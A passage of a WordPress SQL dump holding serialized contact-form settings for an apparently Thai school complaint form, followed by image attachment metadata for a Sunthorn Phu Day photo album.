\";s:6:\"normal\";s:26:\"cform-calendar-font-family\";s:6:\"Roboto\";s:26:\"cform-calendar-custom-font\";s:0:\"\";s:24:\"cform-calendar-font-size\";s:2:\"13\";s:26:\"cform-calendar-font-weight\";s:6:\"normal\";s:24:\"cform-button-font-family\";s:6:\"Roboto\";s:24:\"cform-button-custom-font\";s:0:\"\";s:22:\"cform-button-font-size\";s:2:\"14\";s:24:\"cform-button-font-weight\";s:3:\"500\";s:26:\"cform-timeline-font-family\";s:6:\"Roboto\";s:26:\"cform-timeline-custom-font\";s:0:\"\";s:24:\"cform-timeline-font-size\";s:2:\"12\";s:26:\"cform-timeline-font-weight\";s:6:\"normal\";s:28:\"cform-pagination-font-family\";s:0:\"\";s:28:\"cform-pagination-custom-font\";s:0:\"\";s:26:\"cform-pagination-font-size\";s:2:\"16\";s:28:\"cform-pagination-font-weight\";s:6:\"normal\";s:19:\"payment_require_ssl\";s:0:\"\";s:15:\"submission-file\";s:6:\"delete\";s:12:\"trigger_from\";s:7:\"builder\";s:13:\"template_type\";s:6:\"preset\";s:13:\"template_name\";s:12:\"Contact Form\";s:7:\"form_id\";s:4:\"1416\";s:9:\"form_name\";s:12:\"contact-form\";s:11:\"form_status\";s:7:\"publish\";s:18:\"notification_count\";i:2;s:15:\"previous_status\";s:7:\"publish\";s:13:\"sc_email_link\";s:1:\"1\";s:10:\"sc_message\";s:417:\"<p>Your form has been saved as draft and a resume link has been generated so you can return to the form anytime within {retention_period} days from today. Copy and save the link or enter your email address below to have the link sent to your mail.</p><p>These fields weren\'t saved to your submission draft: Paypal, Stripe, Signature, Password, Captcha, and Upload. Kindly fill them out before submitting the form.</p>\";}s:9:\"client_id\";N;s:22:\"integration_conditions\";a:0:{}s:9:\"behaviors\";a:1:{i:0;a:10:{s:4:\"slug\";s:18:\"behavior-1234-4567\";s:5:\"label\";s:0:\"\";s:14:\"autoclose-time\";s:2:\"10\";s:9:\"autoclose\";s:4:\"true\";s:6:\"newtab\";s:7:\"sametab\";s:16:\"thankyou-message\";s:259:\"<p>ขอบคุณสำหรับการแจ้งเรื่องร้องเรียน.<br>ทางเจ้าหน้าที่จะรีบดำเนินการ และติดต่อกลับโดยเร็ว</p>\";s:22:\"email-thankyou-message\";s:0:\"\";s:23:\"manual-thankyou-message\";s:0:\"\";s:20:\"submission-behaviour\";s:18:\"behaviour-thankyou\";s:12:\"redirect-url\";s:0:\"\";}}s:13:\"notifications\";a:2:{i:0;a:9:{s:4:\"slug\";s:22:\"notification-1234-4567\";s:5:\"label\";s:11:\"Admin Email\";s:16:\"email-recipients\";s:7:\"default\";s:10:\"recipients\";s:20:\"patcharapol@ro.ac.th\";s:13:\"email-subject\";s:47:\"New Form Entry #{submission_id} for {form_name}\";s:12:\"email-editor\";s:114:\"You have a new website form submission: <br /> {all_fields} <br />---<br /> This message was sent from {site_url}.\";s:16:\"email-attachment\";s:4:\"true\";s:4:\"type\";s:7:\"default\";s:10:\"conditions\";a:0:{}}i:1;a:9:{s:4:\"slug\";s:22:\"notification-7058-1000\";s:5:\"label\";s:12:\"School Email\";s:16:\"email-recipients\";s:7:\"default\";s:10:\"recipients\";s:26:\"33010169@sisaketedu1.go.th\";s:13:\"email-subject\";s:47:\"New Form Entry #{submission_id} for {form_name}\";s:12:\"email-editor\";s:114:\"You have a new website form submission: <br /> {all_fields} <br />---<br /> This message was sent from {site_url}.\";s:16:\"email-attachment\";s:4:\"true\";s:4:\"type\";s:7:\"default\";s:10:\"conditions\";a:0:{}}}}'),
(3975,1418,'title_style','default'),
(3976,1418,'_title_style','field_5d1a0217cf408'),
(3978,1419,'title_style','default'),
(3979,1419,'_title_style','field_5d1a0217cf408'),
(3980,1420,'title_style','default'),
(3981,1420,'_title_style','field_5d1a0217cf408'),
(3982,1421,'_edit_lock','1750921735:1'),
(3983,1422,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8.jpg'),
(3984,1422,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8.jpg\";s:8:\"filesize\";i:329946;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18454;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147852;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8688;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91923;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23446;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3985,1423,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1.jpg'),
(3986,1423,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1.jpg\";s:8:\"filesize\";i:379605;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20641;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_1-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148981;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8910;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_1-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148981;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22338;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3987,1424,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2.jpg'),
(3988,1424,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2.jpg\";s:8:\"filesize\";i:272462;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17978;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112502;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8020;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112502;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19257;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3989,1425,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4.jpg'),
(3990,1425,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4.jpg\";s:8:\"filesize\";i:249680;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15716;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_4-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102015;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6667;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_4-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102015;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13256;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3991,1426,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6.jpg'),
(3992,1426,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6.jpg\";s:8:\"filesize\";i:352083;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18526;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_6-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134182;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7815;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_6-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134182;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21073;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3993,1427,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5.jpg'),
(3994,1427,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5.jpg\";s:8:\"filesize\";i:340404;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17952;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131126;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7485;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82970;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19380;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3995,1428,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3.jpg'),
(3996,1428,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3.jpg\";s:8:\"filesize\";i:310852;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17938;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_3-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127047;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7773;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_3-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127047;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17114;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3997,1429,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7.jpg'),
(3998,1429,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7.jpg\";s:8:\"filesize\";i:358257;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18457;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_7-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136691;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7978;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_7-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136691;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22941;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3999,1430,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10.jpg'),
(4000,1430,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10.jpg\";s:8:\"filesize\";i:303672;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17274;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135995;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7992;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84211;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22111;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4001,1431,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-1.jpg'),
(4002,1431,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-1.jpg\";s:8:\"filesize\";i:329946;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18454;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147852;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8688;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91923;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23446;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4003,1432,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11.jpg'),
(4004,1432,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11.jpg\";s:8:\"filesize\";i:282189;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16998;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126395;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7962;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79742;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4005,1433,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9.jpg'),
(4006,1434,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12.jpg'),
(4007,1433,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:65:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9.jpg\";s:8:\"filesize\";i:301500;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17010;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134158;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7984;